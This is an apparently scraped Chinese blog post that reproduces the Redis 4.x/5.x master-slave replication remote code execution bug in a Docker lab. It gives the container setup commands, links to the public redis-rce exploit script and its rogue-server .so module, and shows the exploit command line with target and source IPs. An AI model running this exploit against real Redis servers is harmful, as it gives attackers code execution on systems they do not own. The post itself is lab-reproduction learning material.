Redis基於主從複製的RCE 4.x/5.x 復現

時間  2020-12-21
標籤 html python git github redis docker 學習 server htm blog 欄目 Redis 简体版
原文   原文鏈接

##0x00 前言 這個Redis漏洞出來好久了,一直沒時間復現。 最近在學習docker 就復現了這個漏洞。 docker大法好哇 真的好! docker大法秒哇 真的秒!html

##0x01 環境準備 server docker start //啓動docker服務 docker search redis5.0 //redis5.0查找鏡像 docker pull damonevking/redis5.0 //拉取鏡像 python

##0x02 啓動redis服務 docker run -p 6379:6379 -d damonevking/redis5.0:latest redis-server git

##0x03 exp準備 git clone https://github.com/Ridter/redis-rce.git //下載漏洞利用腳本 注意,這裏少一個.so的文件,到https://github.com/n0b0dyCN/redis-rogue-server下載並放到和redis-rce.py同一目錄下, 而後執行以下命令: python3 redis-rce.py -r 192.168.115.43(目標ip) -L 192.168.115.43(源ip) -f exp.so
github

參考連接: https://mp.weixin.qq.com/s/3ReNSFoQA1V01_APTMnnyA https://github.com/Ridter/redis-rce https://github.com/n0b0dyCN/redis-rogue-server https://www.cnblogs.com/mrhonest/p/11162735.htmlredis

相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程